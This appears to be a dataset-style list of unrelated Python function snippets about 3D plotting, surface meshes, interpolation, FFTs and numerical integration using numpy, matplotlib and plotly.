"def generate_training_data_3D():\n c11 = np.random.uniform(0.05, 1.50, 20)\n c12 = np.random.uniform(-1.50, 1.50, 20)\n c13 = np.random.uniform(-2.50, -0.05, 20)\n c21 = np.random.uniform(-1.50, -0.05, 20)\n c22 = np.random.uniform(-1.50, 1.50, 20)\n c23 = np.random.uniform(0.05, 2.50, 20)\n c1 = np.array([[i, j, k] for i, j, k in zip(c11, c12, c13)])\n c2 = np.array([[i, j, k] for i, j, k in zip(c21, c22, c23)])\n\n points = plt.figure()\n ax = points.add_subplot(111, projection='3d')\n ax.scatter(c1[:, 0], c1[:, 1], c1[:, 2], c='r', marker='^')\n ax.scatter(c2[:, 0], c2[:, 1], c2[:, 2], c='b', marker='*')\n plt.show()\n plt.close()\n\n return c1, c2",
"def gaussian3d(center_z, center_x, center_y, height, width_z, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n width_z = float(width_z)\n return lambda z,x,y: height*np.exp(\n -(((center_z-z)/width_z)**2 + \n ((center_x-x)/width_x)**2 + \n ((center_y-y)/width_y)**2)/2)",
"def surface(func, umin=0, umax=2*np.pi, ucount=64, urepeat=1.0,\n vmin=0, vmax=2*np.pi, vcount=64, vrepeat=1.0):\n\n vtype = [('position', np.float32, 3),\n ('texcoord', np.float32, 2),\n ('normal', np.float32, 3)]\n itype = np.uint32\n\n # umin, umax, ucount = 0, 2*np.pi, 64\n # vmin, vmax, vcount = 0, 2*np.pi, 64\n\n vcount += 1\n ucount += 1\n n = vcount*ucount\n\n Un = np.repeat(np.linspace(0, 1, ucount, endpoint=True), vcount)\n Vn = np.tile (np.linspace(0, 1, vcount, endpoint=True), ucount)\n U = umin+Un*(umax-umin)\n V = vmin+Vn*(vmax-vmin)\n\n vertices = np.zeros(n, dtype=vtype)\n for i,(u,v) in enumerate(zip(U,V)):\n vertices[\"position\"][i] = func(u,v)\n\n vertices[\"texcoord\"][:,0] = Un*urepeat\n vertices[\"texcoord\"][:,1] = Vn*vrepeat\n\n indices = []\n for i in range(ucount-1):\n for j in range(vcount-1):\n indices.append(i*(vcount) + j )\n indices.append(i*(vcount) + j+1 )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j+vcount )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j )\n indices = np.array(indices, dtype=itype)\n vertices[\"normal\"] = normals(vertices[\"position\"],\n indices.reshape(len(indices)//3,3))\n\n return vertices.view(gloo.VertexBuffer), indices.view(gloo.IndexBuffer)",
"def vector3(x, y, z):\n return np.array([x, y, z], dtype=float)",
"def plot_3d(x, y):\n # Create grid coordinates\n x_axis = np.linspace(-10, 10, 50)\n y_axis = np.linspace(-1, 4, 50)\n xx, yy = np.meshgrid(x_axis, y_axis, indexing='xy')\n z = np.zeros((x_axis.size, y_axis.size))\n\n # Calculate z-values based on grid coefficients\n for (i, j), v in np.ndenumerate(z):\n z[i, j] = compute_cost(x, y, theta=[[xx[i, j]], [yy[i, j]]])\n\n # Construct plot\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(xx, yy, z, rstride=1, cstride=1, alpha=0.6, cmap=plt.cm.jet)\n ax.set_zlabel('Cost')\n ax.set_zlim(z.min(), z.max())\n ax.view_init(elev=15, azim=230)\n plt.title('X vs. Y vs. Cost')\n ax.set_xlabel(r'$\\theta_0$', fontsize=17)\n ax.set_ylabel(r'$\\theta_1$', fontsize=17)\n plt.show()\n plt.close()",
"def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def plot_h_static_3d(n: int = 1):\n # todo: Major DRY\n E = -2 / (n + 1) ** 2\n x, ψ = h_static_3d(E)\n\n fig, ax = plt.subplots()\n ax.plot(x, ψ)\n\n ax.grid(True)\n plt.xlim(0, 20)\n plt.ylim(-0.02, 0.02)\n plt.show()",
"def plot3surface( pot, **kwargs ): \n \n fig = plt.figure( figsize = (8., 8.) ) \n gs = matplotlib.gridspec.GridSpec( 3,2, wspace=0.2) \n \n # Make a list with three perpendicular directions which \n # will define the three surface cuts \n perp = [(np.pi/2., 0.), (np.pi/2., -np.pi/2.), (0., -1.*np.pi/2.) ]\n \n # Iterate to plot the three surface cuts\n yMin = 1e16\n yMax = -1e16 \n Ims = []\n for i in range(3):\n ax0 = fig.add_subplot( gs[i,0], projection='3d')\n ax1 = fig.add_subplot( gs[i,1]) \n \n T0, T1, X, Y, Z = surfcut_points( normal = perp[i], \\\n ax0=ax0, **kwargs ) \n \n EVAL = pot.evalpotential(X,Y,Z)\n im = ax1.pcolormesh( T0, T1, EVAL, \\\n cmap=plt.get_cmap('jet') ) \n plt.axes( ax1 ) \n cbar = plt.colorbar(im)\n cbar.set_label( pot.unitlabel, rotation=0) \n \n ymin = EVAL.min()\n ymax = EVAL.max()\n \n Ims.append(im) \n if ymin < yMin : yMin = ymin\n if ymax > yMax : yMax = ymax \n \n for im in Ims:\n im.set_clim( vmin=yMin, vmax=yMax)",
"def f(x, y=0, z=0):\r\n return x ** 2 + y + z",
"def obfft3(x, y, z, f):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n dz = z[1] - z[0]\n Nx = x.size\n Ny = y.size\n Nz = z.size\n inull = Nx//2\n jnull = Ny//2\n knull = Nz//2\n Ff = dx * dy * dz * np.roll(np.roll(np.roll(np.fftn(f), inull-1, 0),\n jnull-1, 1), knull-1, 2)\n\n return Ff",
"def plot_3d(x_data, y_data, Z, df, xlabel, ylabel, xrange=None,\n yrange=None, figsize=(12, 12)):\n fig = pyplot.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d')\n nsamp, nsen = Z.shape\n\n sen_index = df.columns.names.index('sensor')\n senlist = df.columns.levels[sen_index]\n pyplot.yticks(y_data, senlist)\n ax.plot_surface(\n np.repeat(x_data,\n nsen, axis=1),\n np.repeat(np.matrix(y_data), nsamp, axis=0),\n df.values,\n cmap=cm.coolwarm)\n pyplot.xlabel(xlabel)\n pyplot.ylabel('Sensor name')\n ax.set_zlabel(ylabel)\n ax.view_init(elev=45., azim=-130)\n ax.tick_params(axis='y', which='major', labelsize=4)\n pyplot.show()",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the 
colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
"def transform3D(a, f):\n return f[0].dot(a) + f[1]",
"def plot3darray(vec, *args, **kwargs):\n vec = np.reshape(vec, (-1, 3))\n return plt.plot(vec[:, 0], vec[:, 1], vec[:, 2], *args, **kwargs)",
"def visual_callback_3d(fig=None, plot_each=1):\r\n\r\n from mpl_toolkits.mplot3d import Axes3D\r\n # PyMCubes package is required for `visual_callback_3d`\r\n try:\r\n import mcubes\r\n except ImportError:\r\n raise ImportError(\"PyMCubes is required for 3D `visual_callback_3d`\")\r\n\r\n # Prepare the visual environment.\r\n if fig is None:\r\n fig = plt.figure()\r\n fig.clf()\r\n ax = fig.add_subplot(111, projection='3d')\r\n plt.pause(0.001)\r\n\r\n counter = [-1]\r\n\r\n def callback(levelset):\r\n\r\n counter[0] += 1\r\n if (counter[0] % plot_each) != 0:\r\n return\r\n\r\n if ax.collections:\r\n del ax.collections[0]\r\n\r\n coords, triangles = mcubes.marching_cubes(levelset, 0.5)\r\n ax.plot_trisurf(coords[:, 0], coords[:, 1], coords[:, 2],\r\n triangles=triangles)\r\n plt.pause(0.1)\r\n\r\n return callback",
"def full_3d(self, quantity):\n # The data just tells you what integer grid point you are on. Not what actual x,y coordinate you\n # are at\n x = np.arange(0, self.period, self.dx)\n y = np.arange(0, self.period, self.dy)\n z = np.arange(0, self.height + self.dz, self.dz)\n points = np.array(list(itertools.product(z, x, y)))\n # Get the scalar\n scalar = self.get_scalar_quantity(quantity)\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now plot!\n self.scatter3d(points[:, 1], points[:, 2], points[\n :, 0], scalar.flatten(), labels, 'full_3d')",
"def plot3dproj(x, y, z, *args, color=(0,0,0), shadow_dist=1.0, color_proj=None, \n elev_azim=(39,-47), show_labels=False, **kwargs):\n\n if not color_proj:\n color_proj = lighter(color, .6)\n\n\n if np.isscalar(shadow_dist) == 1:\n sdist_x = shadow_dist\n sdist_y = shadow_dist\n sdist_z = shadow_dist\n else:\n sdist_x, sdist_y, sdist_z = shadow_dist\n\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection= '3d')\n \n ax.plot(x, z, *args, zdir='y', zs=sdist_y*np.max(y), color=color_proj, **kwargs)\n ax.plot(y, z, *args, zdir='x', zs=sdist_x*np.min(x), color=color_proj, **kwargs)\n ax.plot(x, y, *args, zdir='z', zs=sdist_z*np.min(z), color=color_proj, **kwargs)\n ax.plot(x, y, z, *args, color=color, **kwargs)\n\n ax.view_init(elev=elev_azim[0], azim=elev_azim[1])\n ax.set_aspect('auto', adjustable='box') \n \n# ratio = 1.0\n# xvals, yvals = ax.get_xlim(), ax.get_ylim()\n# xrange = xvals[1]-xvals[0]\n# yrange = yvals[1]-yvals[0]\n# ax.set_aspect(ratio*(xrange/yrange), adjustable='box')\n fixed_aspect_ratio(1.0)\n\n if not show_labels:\n ax.set_xticklabels([]) \n ax.set_yticklabels([]) \n ax.set_zticklabels([])\n #plt.show()\n\n return ax",
"def extract3d(xaxis, yaxis, zaxis, dat3d, crd_sys, xvec,yvec, zvec, pad=0.):\n func = RegularGridInterpolator((xaxis, yaxis, zaxis), dat3d, \n method='linear', bounds_error=False, fill_value=pad)\n\n # convert x,y,z coordinates to spherical coordinates\n if crd_sys == 'car':\n profx = xvec\n profy = yvec\n profz = zvec\n elif crd_sys == 'sph':\n # radius\n profx = np.sqrt(xvec**2 + yvec**2 + zvec**2)\n\n # theta\n tvec = np.arctan2(zvec, np.sqrt(xvec**2 + yvec**2))\n reg = tvec < 0.\n tvec[reg] = tvec[reg] + 2.*np.pi\n profy = tvec\n\n # azimuth\n pvec = np.arctan2(yvec, xvec)\n reg = pvec < 0\n pvec[reg] = pvec[reg] + 2*np.pi\n profz = pvec\n\n nvec = len(xvec)\n prof = np.zeros([nvec], dtype=np.float64)\n for ii in range(nvec):\n prof[ii] = func([profx[ii], profy[ii], profz[ii]])\n\n return prof",
"def trisurf(\n x,\n y,\n z,\n simplices,\n show_colorbar,\n edges_color,\n scale,\n colormap=None,\n color_func=None,\n plot_edges=False,\n x_edge=None,\n y_edge=None,\n z_edge=None,\n facecolor=None,\n):\n # numpy import check\n if not np:\n raise ImportError(\"FigureFactory._trisurf() requires \" \"numpy imported.\")\n points3D = np.vstack((x, y, z)).T\n simplices = np.atleast_2d(simplices)\n\n # vertices of the surface triangles\n tri_vertices = points3D[simplices]\n\n # Define colors for the triangle faces\n if color_func is None:\n # mean values of z-coordinates of triangle vertices\n mean_dists = tri_vertices[:, :, 2].mean(-1)\n elif isinstance(color_func, (list, np.ndarray)):\n # Pre-computed list / array of values to map onto color\n if len(color_func) != len(simplices):\n raise ValueError(\n \"If color_func is a list/array, it must \"\n \"be the same length as simplices.\"\n )\n\n # convert all colors in color_func to rgb\n for index in range(len(color_func)):\n if isinstance(color_func[index], str):\n if \"#\" in color_func[index]:\n foo = clrs.hex_to_rgb(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n if isinstance(color_func[index], tuple):\n foo = clrs.convert_to_RGB_255(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n mean_dists = np.asarray(color_func)\n else:\n # apply user inputted function to calculate\n # custom coloring for triangle vertices\n mean_dists = []\n for triangle in tri_vertices:\n dists = []\n for vertex in triangle:\n dist = color_func(vertex[0], vertex[1], vertex[2])\n dists.append(dist)\n mean_dists.append(np.mean(dists))\n mean_dists = np.asarray(mean_dists)\n\n # Check if facecolors are already strings and can be skipped\n if isinstance(mean_dists[0], str):\n facecolor = mean_dists\n else:\n min_mean_dists = np.min(mean_dists)\n max_mean_dists = np.max(mean_dists)\n\n if facecolor is None:\n facecolor = []\n for index in range(len(mean_dists)):\n color = map_face2color(\n mean_dists[index], colormap, scale, min_mean_dists, max_mean_dists\n )\n facecolor.append(color)\n\n # Make sure facecolor is a list so output is consistent across Pythons\n facecolor = np.asarray(facecolor)\n ii, jj, kk = simplices.T\n\n triangles = graph_objs.Mesh3d(\n x=x, y=y, z=z, facecolor=facecolor, i=ii, j=jj, k=kk, name=\"\"\n )\n\n mean_dists_are_numbers = not isinstance(mean_dists[0], str)\n\n if mean_dists_are_numbers and show_colorbar is True:\n # make a colorscale from the colors\n colorscale = clrs.make_colorscale(colormap, scale)\n colorscale = clrs.convert_colorscale_to_rgb(colorscale)\n\n colorbar = graph_objs.Scatter3d(\n x=x[:1],\n y=y[:1],\n z=z[:1],\n mode=\"markers\",\n marker=dict(\n size=0.1,\n color=[min_mean_dists, max_mean_dists],\n colorscale=colorscale,\n showscale=True,\n ),\n hoverinfo=\"none\",\n showlegend=False,\n )\n\n # the triangle sides are not plotted\n if plot_edges is False:\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, colorbar]\n else:\n return [triangles]\n\n # define the lists x_edge, y_edge and z_edge, of x, y, resp z\n # coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n is_none = [ii is None for ii in [x_edge, y_edge, z_edge]]\n if any(is_none):\n if not all(is_none):\n raise ValueError(\n \"If any (x_edge, y_edge, z_edge) is None, \" \"all must be None\"\n )\n else:\n x_edge = []\n y_edge = []\n z_edge = []\n\n # Pull indices we care about, then add a None column to separate tris\n ixs_triangles = [0, 1, 2, 
0]\n pull_edges = tri_vertices[:, ixs_triangles, :]\n x_edge_pull = np.hstack(\n [pull_edges[:, :, 0], np.tile(None, [pull_edges.shape[0], 1])]\n )\n y_edge_pull = np.hstack(\n [pull_edges[:, :, 1], np.tile(None, [pull_edges.shape[0], 1])]\n )\n z_edge_pull = np.hstack(\n [pull_edges[:, :, 2], np.tile(None, [pull_edges.shape[0], 1])]\n )\n\n # Now unravel the edges into a 1-d vector for plotting\n x_edge = np.hstack([x_edge, x_edge_pull.reshape([1, -1])[0]])\n y_edge = np.hstack([y_edge, y_edge_pull.reshape([1, -1])[0]])\n z_edge = np.hstack([z_edge, z_edge_pull.reshape([1, -1])[0]])\n\n if not (len(x_edge) == len(y_edge) == len(z_edge)):\n raise exceptions.PlotlyError(\n \"The lengths of x_edge, y_edge and \" \"z_edge are not the same.\"\n )\n\n # define the lines for plotting\n lines = graph_objs.Scatter3d(\n x=x_edge,\n y=y_edge,\n z=z_edge,\n mode=\"lines\",\n line=graph_objs.scatter3d.Line(color=edges_color, width=1.5),\n showlegend=False,\n )\n\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, lines, colorbar]\n else:\n return [triangles, lines]",
"def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout",
"def integrate_3D(x, y, z, xlim, ylim, zlim, csd, xlin, ylin, zlin, X, Y, Z):\n Nz = zlin.shape[0]\n Ny = ylin.shape[0]\n m = np.sqrt((x - X)**2 + (y - Y)**2 + (z - Z)**2)\n m[m < 0.0000001] = 0.0000001\n z = csd / m\n Iy = np.zeros(Ny)\n for j in xrange(Ny):\n Iz = np.zeros(Nz) \n for i in xrange(Nz):\n Iz[i] = simps(z[:,j,i], zlin)\n Iy[j] = simps(Iz, ylin)\n F = simps(Iy, xlin)\n return F",
"def step_3(f: Callable[..., float], x: float, y: np.array, params: Tuple,\\\n h: float, k2: np.array) -> np.array:\n\n # Initialize the output vector.\n n = len(y)\n y_int = np.zeros(n)\n\n # Find dym/dx using the given function, then use it to compute dym-1/dx.\n y_int[0] = f(x + (h / 2), y + (k2 / 2), *params) * h\n\n # Starting with dym-1/dx, compute the other values down to y/dx.\n for i in range(1, n):\n y_int[i] = (y[n-i] + (k2[n-i] / 2)) * h\n\n # Reverse the output vector so y/dx is on top.\n y_int = np.flipud(y_int)\n\n return y_int",
"def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)",
"def mesh_slice(V,n,X,Y,Z):\n from matplotlib import cm\n import mpl_toolkits.mplot3d.axes3d as p3\n import time\n order=np.array([(1,2,0),(2,0,1),(0,1,2)])\n q=np.transpose(V,(order[n])) # See projection for why we could also use take instead.\n if n==0: # Make a less cumbersome and more consistent version of this?\n i,j=X,Y\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==1:\n i,j=Y,Z\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==2:\n i,j=Z,X\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n labels={\n 0:('horizontal axial (mm)','height (mm)'),\n 1:('horizontal radial (mm)','horizontal axial (mm)'),\n 2:('height (mm)','horizontal radial (mm)')\n } \n class animated(object): # 4D, plots f(x,y,z0) specific to mesh_slice.\n def __init__(self,I,J,q):\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.I,self.J=I,J\n self.q=q[:,0,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.q,cmap=cm.coolwarm,antialiased=False)\n def drawNow(self,ii,q,n):\n self.surf.remove()\n self.slc=q[:,ii,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.slc,cmap=cm.coolwarm,antialiased=False)\n plt.ylabel(labels[n][1])\n plt.xlabel(labels[n][0])\n #plt.title(ii) #Optional: this moves down during animation.\n plt.draw() # redraw the canvas\n time.sleep(0.01)\n self.fig.show()\n anim=animated(I,J,q)\n for ii in range(q.shape[1]):\n if ii==q.shape[1]-1:\n plt.title('Animation complete.')\n anim.drawNow(ii,q,n)\n return plt.show()",
"def f(x, y, z, a = 10, b = 20, c = 30):\r\n \r\n return((x + y + z) * (a + b + c))",
"def plot_dist_3p(\n hst,\n xi,\n yi,\n ax=None,\n filled=False,\n fcolors=None,\n **kwargs,\n ):\n vl = [0.3, 0.6, 0.9]\n fig = plot_dist_xp(hst, xi, yi, ax=ax, levels=vl, filled=filled, fcolors=fcolors, **kwargs)\n return fig",
"def box3(x, sigma, output, mode='wrap'):\n n = int(round(2.893638 * sigma - 1.520667))\n a, b, c = 1 + 2 * (n / 3), 1 + 2 * ((n + 1) / 3), 1 + 2 * ((n + 2) / 3)\n nd.uniform_filter(x, a, mode=mode, output=output)\n nd.uniform_filter(output, b, mode=mode, output=output)\n nd.uniform_filter(output, c, mode=mode, output=output)",
"def f(x, alpha=0.80):\n n_particles = x.shape[0]\n #print('n_particles=' + str(n_particles))\n #print('x=' + str(x.shape))\n #print(x[0])\n j = [f_per_particle(x[i], alpha) for i in range(n_particles)]\n #print(j)\n return np.array(j)",
"def plot_3D(Y_data, num_area):\n ref_shape = [Y_data.shape[0], Y_data.shape[1], Y_data.shape[2]]\n fig = plt.figure()\n ax = plt.axes(projection=\"3d\")\n axl = plt.gca()\n axl.set_xlim3d([0, ref_shape[0]])\n axl.set_ylim3d([0, ref_shape[1]])\n axl.set_zlim3d([0, ref_shape[2]])\n\n fig.set_facecolor('black')\n ax.set_facecolor('black')\n ax.grid(False)\n ax.w_xaxis.pane.fill = False\n ax.w_yaxis.pane.fill = False\n ax.w_zaxis.pane.fill = False\n\n ax.set_xlabel('Width', c='white')\n ax.set_ylabel('Depth', c='white')\n ax.set_zlabel('Height', c='white')\n\n for a in np.arange(1, num_area+1):\n loc = np.where(Y_data == a)\n ax.scatter3D(loc[0], loc[1], loc[2], marker=\".\", alpha=0.9)\n\n plt.show()",
"def plot3d(data, label, feature0, feature1, feature2):\n female = []\n male = []\n for i in range(0, 4000):\n if label[i] == 0:\n female.append([data[i, 0], data[i, 1], data[i, 2]])\n elif label[i] == 1:\n male.append([data[i, 0], data[i, 1], data[i, 2]])\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(111, projection='3d')\n plt.rcParams['legend.fontsize'] = 10\n ax.plot([row[feature0] for row in female], [row[feature1] for row in female], [row[feature2] for row in female],\n 'o', markersize=8, color='red',\n alpha=0.5, label='Female')\n ax.plot([row[feature0] for row in male], [row[feature1] for row in male], [row[feature2] for row in male], '+',\n markersize=8, alpha=0.5,\n color='blue', label='Male')\n plt.title('4000 Samples for Female and Male')\n ax.legend(loc='upper right')\n plt.show()",
"def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()",
"def plot3d2(x, y, z, z2, save_fig = True, title = None):\n\n fig = plt.figure(figsize = (12, 7))\n ax = fig.add_subplot(121, projection = '3d')\n try:\n ax.title.set_text(title)\n except:\n pass\n\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n ax.view_init(elev=20., azim=30)\n\n ax = fig.add_subplot(122, projection = '3d')\n\n ax.title.set_text('FrankeFunction')\n\n ax.plot_surface(x, y, z2,\n linewidth=0, antialiased=False)\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n # Customize the z axis.\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n ax.view_init(elev=20., azim=30)\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n try:\n fig.savefig(results_dir + save_fig)\n except:\n pass\n plt.show()",
